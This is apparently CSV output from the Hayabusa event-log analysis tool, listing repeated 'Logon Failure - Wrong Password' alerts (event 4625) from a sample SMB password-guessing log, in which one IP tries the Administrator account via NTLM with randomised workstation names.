2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5fCiyHtI0OTo8pBO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3vkVuU43tsYHUSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3w21sFOu2u7FTDZM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bk7eaqQNK1CEgqoj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rv5joLgkm3QUYPyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4l15usDM7jggwEyw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9QpOvgDmiOgzQqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dqyr8tb9TrO1aJNe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hI1bzjixP8eOdDbw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMTAp20wXS3d1OCk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrQGfxInmlgPqGtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcsMMQbsnUdyLJWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oRYZqBBsq9GyApI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0TAhib6p8fY5iOgI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FerGHj9abOe6ehZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kN4B4KLpXbyKZzGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HJtoyRfP38T3KToO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkI5hLApUWhGnKIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZCPSO4JLjMur2Eow : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHmrv2xFuq7TyIQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8SqYq3msNfFh24lg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YE0a2Bypzc1MMdGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ojgIg88VK6hB72PI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehLrf2GoAhY3Rf7Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ccfgpjwpis15B4gY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vysSf3DsOxQf5fVd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEp88cEeiNw4IQsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5PXDJPzw0gPdlCiH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mwoe9IgWx2UZ7Iuu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3eW0nFDUwKFzoQIw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q0i0p5QxJ4ykYYJt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VsxqWAnd6j2CdyB3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5qdy80mtFWl199k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ce0d84uBK4t2sqR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4dZYZEW1VijjwHN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmqGJWbeap5dv0gC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaNUqChgVSbDkFQu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B4PDZ55it0V4QGnM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQxXVB8Aj5gaw2f2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzDeZtgSJoH74GYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iNAFsZraFvw67WWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aVdnbyzWqk58rOW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjUH2PopXCrrPzqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ylmV2z3WjTWsTpyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qBKZTYRTKuEAgS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JvekO4A5f6QK2ynZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDUqydSeA1guOjIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o71TltsJDyOIuLQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXT3MSCes42dVCNn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FGXiWeT8Evr6G70M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V2RarzrnGgcLaseH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3k7dXu9o1vMkhby : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EDBt76dmYnPstFWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4yjzMC7cw0fe7gjS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eQOWCM7KP68DZTX9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kn9WWWqCIwfrPbie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQcamLSzsXOjP6FL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6R6ZMRoYkAPB35Bq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubqnZm0jmHNFCHrM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ORQ8vL1oo6CkJXK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rDPl1SSddrWEs979 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrK7fENAr1lxFr9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wu4djhEVSMYBOmjF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e0NOdXhEkW6MskA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nqxLHaOtkHHNAa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCrCf73NtEpk5DUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YVFm1epksVGO1nFY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVehuMHvh5kVqRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sERZrNUHsKVEShCb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaSNgw2hvkxLnQF8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FSYOWptgxHYTDv1x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Van1qwuRoWYPWrIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyLCa9OHocazZKQ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxrR5iUsTI9LVnLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxMREacN0QfvL51B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
